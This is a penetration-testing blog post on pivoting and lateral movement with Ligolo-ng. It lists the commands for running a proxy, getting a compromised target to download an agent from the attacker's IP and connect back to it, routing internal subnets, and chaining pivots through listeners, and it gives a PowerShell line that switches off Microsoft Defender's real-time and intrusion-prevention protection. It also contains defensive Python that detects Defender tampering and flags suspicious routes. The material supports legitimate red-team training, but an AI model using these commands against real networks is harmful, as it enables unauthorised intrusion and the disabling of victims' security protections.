Mastering Pivoting for Effective Lateral Movement

Samkalpa Mukherjee
3 min read · Aug 16, 2024


The network diagram for this guide shows four distinct networks: 192.168.0.0/24, 10.10.0.0/24, 172.16.0.0/24 and 200.10.0.0/24, and how devices within these networks are interconnected and reachable from each other.

What is Pivoting?

Pivoting refers to the technique attackers use to move deeper into a network after gaining initial access. It typically involves using a compromised system as a launchpad to reach parts of the network that are not directly reachable from the attacker’s position.

There are many tools available for pivoting, each with its own strengths and weaknesses. For this guide we use Ligolo-ng because of its advantages: ease of use, high performance, security, reliability and cross-platform compatibility.

What is Ligolo-ng?

Ligolo-ng is a next-generation reverse tunneling tool, useful for penetration testers and red teamers. It is an advanced, easy-to-use tool that uses TUN interfaces instead of traditional SOCKS proxies.

How does Ligolo-ng Work?

Ligolo-ng solves the problem of accessing internal networks by using a compromised dual-homed system as a pivot point. It lets us establish tunnels over a secure reverse connection, move laterally within the network and reach otherwise unreachable systems.

How to Set Up Ligolo-ng?

We will compromise a machine inside the external network, which will serve as the “Agent.” The attacker machine (usually a Kali Linux system) will be the “Proxy” server.

Download Agent for Linux:

sudo wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_agent_0.4.3_Linux_64bit.tar.gz

Download Agent for Windows:

wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_agent_0.4.3_Windows_64bit.zip

Download Proxy for Attacker:

sudo wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_proxy_0.4.3_Linux_64bit.tar.gz

There are some prerequisite commands we need to run before launching the Ligolo-ng proxy server.

sudo ip tuntap add user [your_username] mode tun ligolo

sudo ip link set ligolo up

These commands create a tun interface on the Proxy Server (C2). This virtual interface handles the routing of packets to and from the internal network through the agent.

On the attacker machine, get Ligolo-ng running:

./lin-proxy -selfcert -laddr 0.0.0.0:443

Run these commands on the target Machine:

wget http://<your attacker machine IP here>/lin-agent

chmod +x lin-agent

./lin-agent -connect <attacker IP here>:443 -ignore-cert

You should see the connection get grabbed by Ligolo-ng.

Enumerate the Network on Linux

Run the following commands to discover other networks the machine is interacting with:

netstat -an

ip route

ifconfig

Enumerate the Network on Windows

netstat -an | findstr "192.168."

# Disable Antivirus
Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true
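From the detection side, the Set-MpPreference line above is exactly the kind of command PowerShell script block logging records. The following check is an added example, not code from the original post: it scans script-block text for Set-MpPreference invocations that set any -Disable* switch to true and reports which protections were turned off. The sample lines are constructed to resemble the ScriptBlockText field of Event ID 4104 and are not real telemetry.

```python
"""Detection check: flag PowerShell script-block log entries that switch
Microsoft Defender protections off through Set-MpPreference -Disable* $true.
Added example, not code from the original post; the log lines below are
constructed to resemble the ScriptBlockText of Event ID 4104."""
import re

# One Set-MpPreference invocation and its arguments, up to a statement separator.
CMDLET_RE = re.compile(r"\bSet-MpPreference\b([^\r\n;|]*)", re.IGNORECASE)
# Any -Disable<Something> switch set to $true / true / 1, joined by ":" or whitespace.
SWITCH_RE = re.compile(r"-(Disable\w+)(?:\s*:\s*|\s+)\$?(?:true|1)\b", re.IGNORECASE)


def find_defender_tampering(lines):
    """Return [(line_number, [switch, ...]), ...] for every line that disables
    at least one Defender feature; switch names are reported as written."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        hits = set()
        for m in CMDLET_RE.finditer(line):
            hits.update(SWITCH_RE.findall(m.group(1)))
        if hits:
            findings.append((lineno, sorted(hits)))
    return findings


# Constructed sample script-block texts (not real logs).
SAMPLE_SCRIPT_BLOCKS = [
    "Get-MpComputerStatus | Select-Object RealTimeProtectionEnabled",
    "Set-MpPreference -DisableIntrusionPreventionSystem $true "
    "-DisableIOAVProtection $true -DisableRealtimeMonitoring $true",
    "set-mppreference -disablerealtimemonitoring:$true; Start-Sleep 2",
    "Set-MpPreference -ScanAvgCPULoadFactor 20",
]

if __name__ == "__main__":
    for lineno, switches in find_defender_tampering(SAMPLE_SCRIPT_BLOCKS):
        print(f"line {lineno}: Defender protection disabled via {', '.join(switches)}")
```

The rule matches any -Disable* switch rather than a fixed list, so it also catches casing and the `-Switch:$true` form; tuning of benign administrative changes (for example a scan-load setting, as in the last sample line) is left to the caller because those lines never match.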

Now that you know where to go next on the network, let’s set up the tools to explore that area and see what else we can find.

On Attacker machine run:

sudo ip route add 10.10.0.0/24 dev ligolo

Now the Proxy server will route the traffic through the TUN interface to the Agent, which then forwards it to the internal network. This will allow us to interact with the internal network as if directly connected.

Adding More Agents to The Jump Host

To double pivot with Ligolo-ng, we add a listener on the existing agent session (port 11000 here) that redirects incoming connections to the port our Ligolo-ng proxy listens on. The proxy above was started with -laddr 0.0.0.0:443, so the forward target is 127.0.0.1:443 (11601 would be the proxy’s default port).

listener_add --addr 0.0.0.0:11000 --to 127.0.0.1:443 --tcp
listener_add --addr 0.0.0.0:11001 --to 127.0.0.1:443 --tcp
listener_add --addr 0.0.0.0:11002 --to 127.0.0.1:443 --tcp

# To show the active listeners
listener_list

# To delete an active listener
listener_stop <listener ID>

As a result, the agent on a newly compromised host inside the internal network can connect to the first agent’s IP on port 11000 (which forwards to the proxy) and establish a new session from that host.

Accessing the Jump Box

To reach services on the jump box itself, we add a special route to a dedicated IP address that Ligolo-ng reserves: 240.0.0.1. Traffic sent to 240.0.0.1 is redirected by Ligolo-ng to the agent’s loopback address (127.0.0.1), so we can interact with services bound only to localhost on the agent.

The only step required is adding a route for 240.0.0.1/32:

sudo ip route add 240.0.0.1/32 dev ligolo

Now, whenever we want to interact with the jump host, we use the IP 240.0.0.1.
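The routing table is the common thread of the Linux enumeration step (`ip route` on the compromised host) and of the two `ip route add ... dev ligolo` commands on the proxy. The following parser is an added example, not code from the original post or from Ligolo-ng: it reads `ip route` output, lists the subnets each interface is directly attached to (more than one interface means a dual-homed host), and, for a defender auditing a host, flags routes bound to a TUN device and routes into the reserved 240.0.0.0/4 range where Ligolo-ng’s 240.0.0.1 lives. The sample outputs are constructed, and the set of TUN device names is supplied by the caller (on a real host it would come from `ip -d link show`).

```python
"""Parse Linux `ip route` output, list directly connected subnets per interface,
and flag pivot-style entries (TUN-bound routes, 240.0.0.0/4 destinations).
Added example, not code from the original post or from Ligolo-ng; sample outputs
are constructed and TUN device names are passed in by the caller."""
from __future__ import annotations

import ipaddress
from dataclasses import dataclass
from typing import Optional, Union

RESERVED_CLASS_E = ipaddress.ip_network("240.0.0.0/4")
# Bare keywords in `ip route` lines that carry no value.
FLAG_TOKENS = {"linkdown", "onlink", "dead", "offload", "notify", "pervasive"}

Network = Union[ipaddress.IPv4Network, ipaddress.IPv6Network]


@dataclass
class Route:
    dst: Optional[Network]        # None for the default route
    dev: str
    via: Optional[str] = None
    proto: Optional[str] = None   # kernel / dhcp / static ...; None when added by hand
    scope: Optional[str] = None


def parse_ip_route(text: str) -> list[Route]:
    """Turn `ip route` output into Route records (key/value tokens after the destination)."""
    routes = []
    for line in text.splitlines():
        fields = line.split()
        if not fields:
            continue
        dst = None if fields[0] == "default" else ipaddress.ip_network(fields[0], strict=False)
        attrs: dict[str, str] = {}
        i = 1
        while i < len(fields):
            if fields[i] in FLAG_TOKENS:
                i += 1
                continue
            if i + 1 < len(fields):
                attrs[fields[i]] = fields[i + 1]
            i += 2
        routes.append(Route(dst, attrs.get("dev", "?"), attrs.get("via"),
                            attrs.get("proto"), attrs.get("scope")))
    return routes


def connected_subnets(routes: list[Route]) -> dict[str, list[str]]:
    """Interface -> subnets it is directly attached to (link scope, no gateway)."""
    out: dict[str, list[str]] = {}
    for r in routes:
        if r.dst is not None and r.scope == "link" and r.via is None:
            out.setdefault(r.dev, []).append(str(r.dst))
    return out


def is_dual_homed(routes: list[Route]) -> bool:
    """True when more than one interface has a directly attached subnet."""
    return len(connected_subnets(routes)) > 1


def audit_routes(routes: list[Route], tun_devices: set[str]) -> list[str]:
    """Findings a defender would want from a host's routing table."""
    findings = []
    for r in routes:
        where = str(r.dst) if r.dst is not None else "default"
        if isinstance(r.dst, ipaddress.IPv4Network) and r.dst.subnet_of(RESERVED_CLASS_E):
            findings.append(f"route to reserved 240.0.0.0/4 address {where} via {r.dev} "
                            "(Ligolo-ng maps 240.0.0.1 to the agent's loopback)")
        if r.dev in tun_devices and r.proto not in ("kernel", "dhcp"):
            findings.append(f"hand-added route {where} on TUN device {r.dev}")
    return findings


# Constructed `ip route` output of a dual-homed host with two NICs (not a real capture).
DUAL_HOMED_HOST = """\
default via 192.168.0.1 dev eth0 proto dhcp metric 100
10.10.0.0/24 dev eth1 proto kernel scope link src 10.10.0.5
192.168.0.0/24 dev eth0 proto kernel scope link src 192.168.0.20
"""

# Constructed output of a host after `ip route add ... dev ligolo` commands (not a real capture).
PIVOT_HOST = """\
default via 192.168.0.1 dev eth0 proto dhcp metric 100
10.10.0.0/24 dev ligolo scope link
192.168.0.0/24 dev eth0 proto kernel scope link src 192.168.0.100
240.0.0.1 dev ligolo scope link
"""

if __name__ == "__main__":
    routes = parse_ip_route(DUAL_HOMED_HOST)
    print("connected subnets:", connected_subnets(routes), "dual-homed:", is_dual_homed(routes))
    for finding in audit_routes(parse_ip_route(PIVOT_HOST), tun_devices={"ligolo"}):
        print("finding:", finding)
```

Routes added by hand carry no `proto` field, which is why the audit treats a TUN-bound route without `proto kernel` or `proto dhcp` as worth a look; 240.0.0.0/4 is reserved address space that no legitimate route should point into, so a single /32 there is a strong signal on its own.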


Samkalpa Mukherjee

Cybersecurity Professional with a strong focus on Offensive Security and proven track record in protecting Critical Information Infrastructures.